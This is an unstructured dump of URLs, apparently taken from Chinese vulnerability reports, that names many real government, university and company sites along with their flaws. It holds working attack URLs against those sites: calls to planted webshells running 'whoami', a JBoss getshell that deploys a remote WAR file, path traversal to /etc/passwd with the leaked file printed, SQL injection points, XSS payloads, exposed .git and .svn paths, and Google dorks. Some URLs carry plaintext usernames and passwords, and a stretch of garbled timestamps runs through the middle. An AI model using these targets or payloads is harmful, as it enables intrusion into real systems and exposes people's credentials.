http://eps.umgg.com.cn/RAT/Product/HistoryPrice.aspx?kw=1 http://eps.umgg.com.cn/SuperMarket/InterestInfoDetail.aspx?ItemId=1 http://www.cjge-manuscriptcentral.com/Web/QiKan.aspx?Nian=2015&Qi=5 http://www.lcmzxzz.com/Web/QiKan.aspx?Nian=2015&Qi=5 http://gaojian.xhnj.com/Web/QiKan.aspx?Nian=2015&Qi=4 http://xb.cuit.edu.cn/Web/QiKan.aspx?Nian=2012&Qi=5 http://dxjykx.cnmanu.cn/Web/QiKan.aspx?Nian=2014&Qi=6 http://www.jsnyxb.com/Web/QiKan.aspx?Nian=2015&Qi=2 http://www.lcsjwk.com/Web/Qikan.aspx?Nian=2015&Qi=3 http://j.chinatransducers.com/Web/qikan.aspx?Nian=2015&Qi=5 http://www.linpi.net/Web/qikan.aspx?Nian=2012&Qi=5 http://www.mfskin.net/Web/qikan.aspx?Nian=2015&Qi=5 http://www.gjmzyfs.com/Web/QiKan.aspx?Nian=2015&Qi=3 http://ctc.hlglzz.com/Web/QiKan.aspx?Nian=2015&Qi=5 http://kelonminisite.hisense.com/ajax.php?act=saveEmail&email=177712@qq.com www.qh.lawtv.com.cn https://portal.haier.com/web/reSetPassWord/reset?replyType=1&cn=xxxxxx&tel=&email=&wwwmail=xxxxxxxxxx@163.com http://www.cqsf.com.cn/template/index.php http://rcls.seu.edu.cn/,登录存在SQL注入点,甚至于在chrome浏览器下admin帐号+任意密码,先报错后直接进入 http://**.**.**/adminlogin=error http://yuqing.nais.net.cn:90/om/Index.action存在命令执行漏洞 http://yuqing.nais.net.cn:90/om/mytesttest.jsp密码chopper http://121.40.95.218 http://www.baobaowoaini.cn/meiyi/login.php登陆点 http://111.207.210.120/autoportal/LoginForm.jsp http://202.100.200.203/autoportal/LoginForm.jsp(提示无权限访问,但没关系,漏洞仍然可以利用) http://202.100.200.73/autoportal/LoginForm.jsp http://113.59.108.89/autoportal/LoginForm.jsp http://221.11.139.164/autoportal/LoginForm.jsp(提示无权限访问,但没关系,漏洞仍然可以利用) http://111.207.210.120/autoportal/LoginForm.jsp该站为例 http://111.207.210.120/invoker/JMXInvokerServlet,可通过下面代码进行getshell http://111.207.210.120/invoker/JMXInvokerServlet system:service=MainDeployer http://p2j.cn/is.war http://111.207.210.120/is/index.jsp gms.szkuniu.com/account/login/in http://www.rcsp.cn:8083/lslp/WHOut/DistrictIndex_new.aspx?DFID=RC http://222.135.78.34:8083/lslp/WHOut/DistrictIndex_new.aspx?DFID=RC http://221.2.149.28:8090/lslp/WHOut/DistrictIndex_new.aspx?DFID=XQ http://www.rszwfwzx.gov.cn/lslp/whout/DistrictIndex_new.aspx?DFID=H http://www.whaac.gov.cn:8090/lslp/whout/DistrictIndex_new.aspx?DFID=HC http://data.tiens.com/ https://github.com/chrisyun/history-project/blob/510e1983d51fd7de123536265b95f9fbbeef0cc4/parrot/parrot-data-init/src/main/resources/mail-config.xml http://login.jifentao.com/password/repassword3.jsp http://login.jifentao.com/password/repassword4.jsp https://github.com/Justxu/origin/blob/9eb0dc625662b5735979c226beebc7597d206578/mail.py http://www.189an.cn/front/index.do http://admin.lakalaec.com/index http://m.jumei.com/i/MobileWap/request_delegate?url=/etc/passwd http://group.tempus.cn http://www.dag.nwnu.edu.cn/News/detail.asp?newsID=78 http://www.tempusworld.com/web/queryById.action http://122.226.154.126/TSPB/web/pubinfo/pubinfo.jsp?itemType=0&pubType=1 http://220.191.221.174/TSPB/web/hy/pubinfo/pubinfo.jsp?itemType=0&pubType=1 http://www.hyztb.gov.cn/TSPB/web/hy/pubinfo/pubinfo.jsp?itemType=4&pubType=4 http://60.211.194.178/TSPB/qfweb/pubinfo/pubinfo.jsp?itemType=3&pubType=2 http://www.smztb.com.cn/TSPB/web/pubinfo/pubinfo.jsp?itemType=0&pubType=1 http://113.105.64.217/admin/ google:inurl:companycglist.aspx?ComId=* http://eps.umgg.com.cn/Orders/k3orderdetail.aspx?FINTERID=1 http://eps.umgg.com.cn/organization/GetUser_List2.aspx?UserName=test http://eps.umgg.com.cn/person/InviteList.aspx?iType=ZB&comid=1&id=0000 http://www.aegon-cnooc.com/survey/serverdo.jsp?ac=check&code=e&phone=1&stamptime=1432654178771 http://i.club.sohu.com/?action=save&controller=userinfo http://www.dodo178.com http://www.dodo178.com/front/recharge.jsp?account=null&gameid=28&srvid=1 http://www.ln86e.com/Shequ/Search.aspx?page=1&SearchTxt=1&tag=1 zhanshangfuwu.chinajoy.net/admin/admin.php http://www.nbdaj.gov.cn/datk/titans/presz.action?method=getsyInfo存在命令执行漏洞 http://www.dodo178.com/ www.dodo178.com http://jpkc.zzu.edu.cn/hbyycai/flash/step.asp?id=8 http://sqlmap.org http://jpkc.zzu.edu.cn:80/hbyycai/flash/error.asp https://ebank.ccfccb.cn//pweb/prelogin.do?_locale=zh_CN&LoginType=&BankId=313223007007&_viewReferer=/../../js/common.js/%3f http://wooyun.org/bugs/wooyun-2010-088620 http://www.jshn.com.cn:81 http://61.185.224.148:8080 http://www.xzyedu.com.cn:8080 http://218.26.79.12:8080 http://www2.gxwzy.com.cn:60 www.cinemark.com.tw/showDm.asp?id=4 http://rmp.haier.net/admin/ http://photo.hsw.cn:80/Work/column_list/catid/10 http://bbs.shouliwang.com/WebResource.axd?d=1433135288 http://fz.shouliwang.com/WebResource.axd?d=1433137211 http://my.shouliwang.com/WebResource.axd?d=1433135193 http://pic.shouliwang.com/WebResource.axd?d=1433135962 http://shouliwang.com/WebResource.axd?d=1433135132 http://wys.shouliwang.com/WebResource.axd?d=1433137108 http://www.shouliwang.com/WebResource.axd?d=1433135907 http://www.shouliwang.com/WebResource.axd?d=9MBwmxN6TLKjC8S3CdFGyw2 inurl:http://youxi.baidu.com/password http://youxi.baidu.com/wly/2011-10-20/1321346899.html?username=dao990&password=wang523&Submit= http://youxi.baidu.com http://youxi.baidu.com/qmr/micro-client/?username=buhuiqiming&password=xy13644978794&remember_me= http://youxi.baidu.com/qmr/micro-client/?username=wangzhelong001&password=xy13644978794&remember_me= http://bbs.iqianjin.com//data/restore.php http://lib.cumtb.edu.cn/CommonQusetion.aspx?SectionId=3c369f17-81db-48c6-8b8f-be12707a99f5 http://219.242.65.10/Recommend.aspx?SectionId=b7f8794d-aa0a-4de8-b136-4325f82e992f http://www.tzlib.cn/Special_Resource.aspx?SectionId=1c5d5905-ef91-4f25-a7ee-3b1925d76b28 http://219.242.65.10/ReaderWrite.aspx?SectionId=9a7eef33-7edf-4a2b-8d99-ffe2e6ed61d7 http://118.244.213.93:8018/Map.aspx?SectionId=af17aeb1-8819-4977-9297-c1ba18031bbb http://www.hyxlib.com/Survey_list.aspx?SectionId=dbf6b7bc-12f4-4a36-b1f3-01a69933a0ac http://drtsg.qzjmc.edu.cn:8084/Reader_Buy.aspx?SectionId=7dfbac8d-1ffc-4e70-bd38-5c0a231fd1f2 http://www.nhlib.com.cn/Question.aspx?SectionId=d63b40ad-96e5-41c8-999f-2f9af8cad5fd http://ballgames.confucian.edu.my/ http://ballgames.confucian.edu.my/system http://www.263.net/?chr=gb&func=login&domainType=wm&buttonType=&usr=&domain=&encode=on&username=daibaozhong@kkqianwei.com&pass=11**aaaa http://800.189.cn/file/download.do?file=../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:496:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin cimsrvr:x:498:500:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin saslauth:x:497:76:"Saslauthd saslauth:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin qpidd:x:496:499:Owner Daemons:/var/lib/qpidd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:495:494:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin stap-server:x:155:155:Systemtap Server:/var/lib/stap-server:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ident:x:98:98::/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin tomcat_fmp:x:611:611::/home/tomcat_fmp:/bin/bash zh_readonly:x:601:601::/home/zh_readonly:/bin/bash http://www.szaudio.com/admin/login.aspx http://www.4006001775.com/mobile/theme/btx/order/orderDetail.html?orderId=70551&dev http://www.dfrobot.com.cn/delete_cart_goods.php http://totemdb.whu.edu.cn/homepage/admin/subpage.php?tablename=researcher&type=1 http://www.cjge-manuscriptcentral.com/Web/News.aspx?searchid=163768 http://www.lcmzxzz.com/Web/News.aspx?searchid=586073 http://gaojian.xhnj.com/Web/News.aspx?searchid=313670 http://xb.cuit.edu.cn/Web/News.aspx?searchid=112266 http://dxjykx.cnmanu.cn/Web/News.aspx?searchid=107094 http://www.jsnyxb.com/Web/News.aspx?searchid=1 http://www.lcsjwk.com/Web/News.aspx?searchid=1 http://j.chinatransducers.com/Web/News.aspx?searchid=1 http://www.linpi.net/Web/News.aspx?searchid=1 http://www.mfskin.net/Web/News.aspx?searchid=1 http://www.gjmzyfs.com/Web/News.aspx?searchid=1 http://ctc.hlglzz.com/Web/News.aspx?searchid=328935 http://www.lcjsyx.com/Web/News.aspx?searchid=84777 http://www.apsjournal.com/web/News.aspx?searchid=111061 http://www.cjge-manuscriptcentral.com/Web/NewsShow.aspx?id=31 http://www.lcmzxzz.com/Web/NewsShow.aspx?id=118 http://gaojian.xhnj.com/Web/NewsShow.aspx?id=6 http://xb.cuit.edu.cn/Web/NewsShow.aspx?id=8 http://www.xnumed.com/NewsShow.aspx?id=1 http://www.lcsjwk.com/Web/NewsShow.aspx?id=1 http://j.chinatransducers.com/Web/NewsShow.aspx?id=1 http://www.gjmzyfs.com/Web/NewsShow.aspx?id=1 http://ctc.hlglzz.com/Web/NewsShow.aspx?id=148 http://www.lcjsyx.com/Web/NewsShow.aspx?id=1 http://www.apsjournal.com/Web/NewsShow.aspx?id=1 http://www.025journal.com/demo1/Web/NewsShow.aspx?id=1 http://focus-user.liba.com/login http://www.lgqzwfw.gov.cn/xspww/OutNetChannel/ItemOrgList.aspx http://60.215.8.148:6006//OutNetChannel/ItemOrgList.aspx http://www.lgqzwfw.gov.cn/xspww/OutNetChannel/ItemOrgList.aspx http://shenpi.dongying.gov.cn/fabu/OutNetChannel/ItemOrgList.aspx http://222.135.78.34:8086/OutNetChannel/ItemOrgList.aspx http://zz.yiban.cn/ http://s.suning.com/report.htm#unknown http://221.131.114.12:8001/Struts2/index.action http://www.cqyz.gov.cn/web1/info/index.asp?classid=2328 http://www.cqyz.gov.cn/web1/info/index.asp http://sqlmap.org http://www.readphone.com.cn/admin.php http://42.62.3.187:8080/axis2/axis2-admin/ http://yjs.jxutcm.edu.cn/web/ViewDoc.aspx?id=1228 http://ibank.focus.cn/account/ http://ibank.focus.cn/account/BindSafeQuestion http://**.**.**/phpinfo.php http://211.154.135.186:8080/redis.php http://law.ustc.edu.cn/News.php?id=21该网页没有过滤注入字符导致存在注入漏洞 http://www.ntcits.com.cn/ http://www.ntcits.com.cn/App.TASite/admin/Login.aspx http://www.dalitour.gov.cn/admin.php自动跳转到登录页面 http://www.dalitour.gov.cn/index.php?m=admin&c=index&a=login&pc_hash= http://www.dalitour.gov.cn/uploadfile/2015/0601/20150601091337189.jpg/.php http://hunangrain.gov.cn/shenpi/main/upload.jsp http://hunangrain.gov.cn/shenpi/upload/20150602_065848.jsp?pwd=023&i=whoami http://www.1890.gov.cn/upload.jsp http://www.1890.gov.cn/upload/1433198443992@1433198443992.jsp?pwd=023&i=whoami http://12358.ndrc.gov.cn/price/website/record/addmaterial.jsp?runid=201506020642TT00322B17A53F48D082 http://www.dyjc.gov.cn:7001/dataform/upload/upload.jsp http://www.dyjc.gov.cn:7001/download/jcyfj/201506/9C0F229D23B5D758EF02B15AB254516A.jsp?pwd=023&i=whoami http://iayoa.yantai.gov.cn/index.jsp inurl:http://service.caijing.com.cn/usermanage/newpassword/email http://service.caijing.com.cn/usermanage/newpassword/email/d3ltMTIyMUBnbWFpbC5jb20=/checktime/a3e0633ded50c1fe7e46900c4120b302 http://service.caijing.com.cn/usermanage/newpassword/email/c2lsbHltdXBwZXRAMTI2LmNvbQ==/checktime/a37a706ca8a2fc548049ea30b3863c0c http://service.caijing.com.cn/usermanage/newpassword/email/Z3VqZjIyNTIxMkBnbWFpbC5jb20=/checktime/4d2db21377ff4bdca0bae7838652f4cd http://113.105.64.197:82/login.action http://220.178.116.78:7001/defaultroot/public/jsp/singleupload.jsp?path=desktop&mode=add&hiddenName=unitImgSaveName&visualName=unitImgName http://61.178.20.34 http://bec.pigai.org/ http://www.luxcinema.com.tw/web/film_intro.php?film_id=93 https://tienmou.woviecinemas.com.tw/ticket_wovie.php?pid_for_movie=430 http://sd.sd12318.com/login.html http://www.metrohk.com.hk/index.php?cmd=detail&id=277331 http://bj.feiren.com/flight/passenger_tmc.php?isNew=1&go_from=0 http://bj.feiren.com/home/contact/deletecontact.html?did=762951&tabType=hotelpeople&deletetype= www.daimayi.com/index.php/Ask/index/p/0/type/*.html http://192.168.1.119/view/main/config.cgi http://192.168.1.119 http://www.guolian-life.com/getImage.html?fileUrl=/usr/local/app/upload/images&fileName=wkt_20150320093831932.png http://www.guolian-life.com/getImage.html?fileUrl=/etc&fileName=hosts http://uc.tuanche.com/login/quit http://wx.gx10010.com/Login.aspx http://wx.gx10010.com/main.aspx http://www.e21cn.com/ http://bm.e21cn.com/ http://bm.e21cn.com/log/login.asp http://bm.e21cn.com/adminblock/bminfo/bmtxt.asp?ksid=606&kshid=791936&bminfoid=45801&page=1&ksname=bm_cy100318 http://bm.e21cn.com/adminblock/bminfo/bmtxt.asp?ksid=606&kshid=791937&bminfoid=45801&page=1&ksname=bm_cy100318 http://bm.e21cn.com/adminblock/bminfo/bmtxt.asp?ksid=606&kshid=791937&bminfoid=45801&page=1&ksname=bm_cy100318 URL:http://shop.lkk.com/php/index.php?lang=zh_TW http://timber2005.com/ http://px2.timber2005.com/Webpage/teacher_content.aspx?infoId=556 http://px2.timber2005.com/WebPage/kc_list.aspx?planid=Y29udmVydChpbnQsKEBAdmVyc2lvbikp&examName=%E5%88%9D%E7%BA%A7%E4%BC%9A%E8%AE%A1%E5%B8%88%E5%9F%BA%E7%A1%80%E6%B5%8B%E8%AF%95 http://www.citsgd.com.cn http://www.citsgd.com.cn/shownews.aspx?sid=cits&id=2387 http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx http://60.215.8.148:6006//InteractiveCommunication/InterActiveIndex.aspx http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx http://shenpi.dongying.gov.cn/fabu/InteractiveCommunication/InterActiveIndex.aspx http://222.135.78.34:8086/InteractiveCommunication/InterActiveIndex.aspx index.php/LoginApi/login/ http://training.transn.com http://ads.catarc.info/DSS/login/login.action存在命令执行 http://agent.b2b.cn/Registe!registe.action inurl:class_bjjj.jsp?classId= http://www.dg5x.com/News/ClassNews/class_bjjj.jsp?classId=E201402 http://www.whjksyxx.com/News/ClassNews/class_bjjj.jsp?classId=x201402 http://www.czxqxx.cn/webschool/News/ClassNews/class_bjjj.jsp?classId=x201411 http://www.jyzzsx.net/News/ClassNews/class_bjjj.jsp?classId=x201115 http://www.whjkhsxx.com/News/ClassNews/class_bjjj.jsp?classId=1111 http://v.chengdu.cn/.svn/entries http://mz.hn165.com/pages/jieri.jsp?month=0 http://ssl.elong.com/hotel2/.svn/entries URL:http://www.100eshu.com/ScEbook_Admin/login.aspx a05:11PM a05:25PM a05:07PM a02:11PM a05:29PM a03:16PM a05:25PM a01:59PM a02:33PM a09:00AM a09:00AM a08:33AM a05:26PM a02:02PM a02:15PM a02:04PM a05:19PM a05:20PM a06:46PM a03:40PM a05:54PM a03:59PM a05:26PM a05:26PM a05:27PM a05:28PM a05:28PM a05:29PM a05:12PM a05:46PM a05:47PM a04:12PM a03:04PM a02:16PM a02:16PM a02:17PM a02:25PM a02:25PM a02:26PM a02:27PM a02:28PM a05:13PM a02:28PM a02:29PM a02:30PM a02:31PM a02:43PM a02:43PM a02:43PM a02:45PM a05:15PM a02:45PM a02:45PM a02:46PM a02:47PM a02:47PM a02:47PM a02:48PM a02:48PM a02:51PM a02:52PM a05:19PM a02:53PM a02:53PM a02:55PM a03:16PM a03:17PM a03:18PM a03:18PM a03:19PM a05:24PM a03:20PM a03:22PM a03:22PM a03:23PM a04:27PM a05:24PM a04:29PM a04:30PM a04:31PM a04:32PM a04:32PM a04:32PM a01:53PM http://www.daimayi.com/index.php/Strategy/detail/id/17 http://www.daimayi.com/index.php/Strategy/detail/id/17-1 http://www.daimayi.com/index.php/Strategy/detail/id/16 http://www.ctsxm.cn/ http://114.80.157.152:8080/esp/login/check!checkuser.action http://114.80.157.153:8080/interactionback/login/check!login.action http://v.baidu.com/v?word=zz%22%3E%3Cimg%20src=x%3Exxx&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=utf-8#order=1&sc=4&pn=0 http://v.baidu.com/v?word=zz%22%3E%3Cimg%20src=x%3Exxx&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=utf-8&order=1&sc=4&pn=0 inurl:/epaper http://epaper.cmt.com.cn/epaper/uniflows/html/2015/05/29/K-01/default.htm http://zcrb.zcwin.com/epaper/ http://szb.xgrb.cn:9999/epaper/xgwb/html/2015/06/02/01/default.htm http://szb.dingzhoudaily.com:10000/epaper/paper.jsp?papername=%B6%A8%D6%DD%C8%D5%B1%A8&pubdate=2014-07-24&pagename=01&pubpath=aper/dzrb/html http://www.zgkjb.com.cn/epaper/uniflows/html/2015/03/13/boardpicurl.htm http://dyrb.dy001.cn:9999/epaper/dyrb/html/2015/05/23/02/02_54.html http://www.pyxww.cn:8080/epaper/paper.jsp?papername=%E5%A7%D1%F4%C8%D5%B1%A8&pubdate=2015-03-05&pagename=01&pubpath=pyrb/html http://www.yongxin.gov.cn/epaper/uniflows/20150406/01/01_33.htm http://124.42.72.218/epaper/uniflows/html/2015/05/29/06/default.htm http://www.lasa-eveningnews.com.cn/epaper/uniflows/html/2015/05/29/02/default.htm http://lqszb.zjol.com.cn/epaper/lq/html/2014/11/17/02/default.htm http://www.hbnews.net/epaper/hbrb/html/2014/10/17/1/default.htm http://xyz.lsol.com.cn/epaper/search/index.jsp http://www.lznews.gov.cn:9999/epaper/lzrb/html/2015/06/02/01/default.htm http://szb.zgsynews.com/epaper/xsy/html/2015/05/05/1/1_42.htm http://nnrb.nnnews.net:9999/epaper/nnrb/html/2013/03/26/00/default.htm http://58.42.132.75:8080/epaper/trrb/html/ http://bhrb.beihai.gov.cn:8080/epaper/bhwb/html/2015/06/01/01/default.htm http://www.grainnews.com.cn:9998/epaper/uniflows/html/2015/04/02/boardpicurl.htm http://58.214.255.28/epaper/wxxzk/html/2014/12/19/B05/B05_29.htm http://epaper.dydaily.com.cn:9999/epaper/dyrb/html/2015/06/02/01/default.htm http://szb.xgrb.cn:9999/epaper/ http://114.113.148.102/epaper/uniflows/html/2015/04/24/K-02/default.htm http://www.baoshandaily.com:8080/epaper/search/index.jsp http://epaper.shaoyangnews.net/epaper/syrb/html/2010/01/30/04/04_55.htm http://ldrb.xxcmw.com:81/epaper/ldrb/html/2014/12/20/01/01_69.htm http://61.153.66.148/epaper/search/index.jsp http://www.ceh.com.cn/epaper/uniflows/html/2015/06/02/A01/default.htm http://122.224.69.77:9999/epaper/uniflows/html/2013/09/09/01/01_130.htm http://219.156.123.48:8080/epaper/uniflows/hnfzb/2015/01/21/11/11_53.htm http://www.daimayi.com/index.php/Message/detail/id/33 http://www.daimayi.com/index.php/Message/detail/id/31 http://www.daimayi.com/index.php/Message/detail/id/33-2 http://admission.zstu.edu.cn/about.asp?id=2&type1=2 http://admission.zstu.edu.cn/about.asp?id=2&type1=2 http://sqlmap.org http://merch.cib.com.cn/merchant/merchant/loginMer inurl:/epaper http://epaper.cmt.com.cn/epaper/uniflows/html/2015/05/29/K-01/default.htm http://zcrb.zcwin.com/epaper/ http://szb.xgrb.cn:9999/epaper/xgwb/html/2015/06/02/01/default.htm http://szb.dingzhoudaily.com:10000/epaper/paper.jsp?papername=%B6%A8%D6%DD http://www.zgkjb.com.cn/epaper/uniflows/html/2015/03/13/boardpicurl.htm http://dyrb.dy001.cn:9999/epaper/dyrb/html/2015/05/23/02/02_54.html http://www.pyxww.cn:8080/epaper/paper.jsp?papername= http://www.yongxin.gov.cn/epaper/uniflows/20150406/01/01_33.htm http://124.42.72.218/epaper/uniflows/html/2015/05/29/06/default.htm http://www.lasa-eveningnews.com.cn/epaper/uniflows/html/2015/05/29/02/default.htm http://lqszb.zjol.com.cn/epaper/lq/html/2014/11/17/02/default.htm http://www.hbnews.net/epaper/hbrb/html/2014/10/17/1/default.htm http://xyz.lsol.com.cn/epaper/search/index.jsp http://www.lznews.gov.cn:9999/epaper/lzrb/html/2015/06/02/01/default.htm http://szb.zgsynews.com/epaper/xsy/html/2015/05/05/1/1_42.htm http://nnrb.nnnews.net:9999/epaper/nnrb/html/2013/03/26/00/default.htm http://58.42.132.75:8080/epaper/trrb/html/ http://bhrb.beihai.gov.cn:8080/epaper/bhwb/html/2015/06/01/01/default.htm http://www.grainnews.com.cn:9998/epaper/uniflows/html/2015/04/02/boardpicurl.htm http://58.214.255.28/epaper/wxxzk/html/2014/12/19/B05/B05_29.htm http://epaper.dydaily.com.cn:9999/epaper/dyrb/html/2015/06/02/01/default.htm http://szb.xgrb.cn:9999/epaper/ http://114.113.148.102/epaper/uniflows/html/2015/04/24/K-02/default.htm http://www.baoshandaily.com:8080/epaper/search/index.jsp http://epaper.shaoyangnews.net/epaper/syrb/html/2010/01/30/04/04_55.htm http://ldrb.xxcmw.com:81/epaper/ldrb/html/2014/12/20/01/01_69.htm http://61.153.66.148/epaper/search/index.jsp http://www.ceh.com.cn/epaper/uniflows/html/2015/06/02/A01/default.htm http://122.224.69.77:9999/epaper/uniflows/html/2013/09/09/01/01_130.htm http://219.156.123.48:8080/epaper/uniflows/hnfzb/2015/01/21/11/11_53.htm http://zz.yiban.cn/ http://www.3kloan.com/login.do?method=wjmm http://zone.jd.com/help/tohelp.htm?key=CMS-10-07e0896a0c79a057000001%3Cimg%20src=1%20onerror=alert%281%29%3E http://113.105.64.211/是腾邦的 http://113.105.64.211:8080/Account/Login.aspx http://113.105.64.211:8080/WebResource.axd?d=IW7f190VPT_NcCR www.dfrobot.com.cn http://lib.njust.edu.cn/english/content.asp?id=2 http://lib.njust.edu.cn/english/content.asp?id=2 http://sqlmap.org http://group.tempus.cn/pw/job2/UI/employ_introduce.as http://push.my.tv.sohu.com/user/a/fo/batchadd.do?uids=205055095&callback= http://push.my.tv.sohu.com/user/a/fo/batchadd.do?uids=205055095&callback=test http://www.shouliwang.com/travel/editor/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=C:/ http://www.glsc.com.cn/glzq/question.do?currentPage=2&keyCode=question_glzb0&method=getQuestionByKeyCode2&pagesize=12&totalCount=14 http://demo.jspgen.net:81/CMS/Node.gen?Id=14 http://www.aklanao.com/CMS/Node.gen?Id=6 http://linye.langao.gov.cn/CMS/Node.gen?Id=1 http://jm.langao.gov.cn/CMS/Node.gen?Id=1 http://xinfang.langao.gov.cn/CMS/Node.gen?Id=1 http://lg3e.langao.gov.cn/CMS/Node.gen?Id=1 http://lgjw.langao.gov.cn/CMS/Node.gen?Id=1 http://ngs.langao.gov.cn/CMS/Node.gen?Id=1 http://www.lgjw.gov.cn/CMS/Node.gen?Id=29 http://www.sxhbgz.com/CMS/Node.gen?Id=29 http://www.lgjcy.gov.cn/CMS/Node.gen?Id=7 http://hbj.ankang.gov.cn/CMS/Node.gen?Id=20 http://www.zhp.gov.cn/CMS/Node.gen?Id=9 http://www.jspgen.com/CMS/Node.gen?Id=8 http://www.akbc.cn/CMS/Node.gen?Id=35 http://wjdfdc.com.cn/CMS/Node.gen?Id=14 http://www.xahuat.com/CMS/Node.gen?Id=1 http://www.lgzf.gov.cn/CMS/Node.gen?Id=1 http://www.aklanao.com/CMS/Node.gen?Id=1 http://www.lncmee.com/ http://bbs.meizu.cn/live.html http://fin.yundasys.com:7088/Web_sc/programs.gn http://card.yaic.com.cn/online/web/sale/card/login.jsp http://card.yaic.com.cn/online/web/sale/card/download/download.jsp http://daimayi.com/index.php/Counselor/detail/id/76 http://113.105.128.146:8080/edoas2/oa.jsp http://113.105.128.146:8080/zecmd/zecmd.jsp?comment=whoami http://121.33.188.60/edoas2/oa.jsp http://121.33.188.60/zecmd/zecmd.jsp?comment=whoami http://110.64.192.212/edoas2/oa.jsp http://110.64.192.212/zecmd/zecmd.jsp?comment=whoami http://121.10.235.104/edoas2/oa.jsp http://121.10.235.104/zecmd/zecmd.jsp?comment=whoami http://49.115.145.206/web_shell_cmd.gch http://sales.tempus.cn系统登录处 http://dtdrc.gov.cn http://115.236.101.203:9300/ http://www.glsc.com.cn/glzq/mobileQuestion.do?method=listQuestionForPage&qType=tbAdvice* http://www.glsc.com.cn/glzq/jyzx/info_content.jsp?id=486551567207* http://www.glsc.com.cn/glzq/financing/management/new_y5.jsp?fundcode=B40325* http://www.glsc.com.cn/glzq/f10Action.do?codes=*1dV&method=getJTBshow&pagesize=7 http://www.glsc.com.cn www.glsc.com.cn http://www.fjedu.gov.cn/ http://www.fjedu.gov.cn/html/jyyw/tpxw/2015/04/22/3a30378e-66df-42d8-8d1a-3f9dd3fd2f6d.html http://www.fjedu.gov.cn/submission/showAttach.do?path=99999950/2015/04/22/QQ图片20150421155912_编辑.jpg&fileName=QQ图片20150421155912_编辑.jpg&isAttach=0 http://www.fjedu.gov.cn/submission/showAttach.do?path=99999950/2015/04/22/../../../../../../../../../etc/passwd&fileName=passwd&isAttach=0 http://wapdhsh.szkuniu.com/admin/ http://wan.bigertech.com/ http://116.211.118.6:8080/ http://www.100exam.com/topper/syslogin.aspx http://bug.kokozu.net/ http://log.komovie.cn/ http://www.ylrtv.com.cn/media_vod/read.php?TopicCode=1104020A http://www.suning.com/emall/SNNetStoreView?storeId=10052&catalogId=10051&storeType=1 google:inurl:companycglist.aspx?ComId=* http://eps.umgg.com.cn/PriceDetail/PriceComposition_Formula.aspx?elementId=1&indexNum=3 http://eps.umgg.com.cn/Products/Category/CategoryOption.aspx?option=IsStop&classId=1 http://eps.umgg.com.cn/Products/Tiens/CategoryStockView.aspx?id=1 http://b.weimai.com/.git/config http://aps.stc.gov.cn:8082/kszzyy/specialLogin_toUpdatePwd.action http://**.**.**/mnks/aq2014/mn.aspxID=xxxx http://221.2.149.28:8090/lslp/WHOut/DistrictIndex_Sc.aspx?DFID=JQ http://www.rcsp.cn:8083/lslp/WHOut/DistrictIndex_Sc.aspx?DFID=JQ http://222.135.78.34:8083/lslp/WHOut/DistrictIndex_Sc.aspx?DFID=JQ http://www.rszwfwzx.gov.cn/lslp/whout/DistrictIndex_Sc.aspx?DFID=JQ http://www.whaac.gov.cn:8090/lslp/whout/DistrictIndex_Sc.aspx?DFID=JQ http://vip.game.pps.tv/index.php?r=userCenter/myProfile http://si.power.10086.cn/si/portal/login.jsp http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100014391&ticket=46F7E46EEC319B9598DCB64194B3E05C&domain=si http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010000 http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010001 http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010002 http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010888 http://si.power.10086.cn https://user.lufax.com/user/sem-register2 site:wapmail/index.action http://www.gczw.gov.cn/portal/xzsp4/newlist2.aspx?columntitle=%E8%A7%84%E7%AB%A0%E5%88%B6%E5%BA%A6 http://www.gjzwzx.cn/portal/xzsp3//newlist2.aspx?columntitle=%E8%A7%84%E7%AB%A0%E5%88%B6%E5%BA%A6 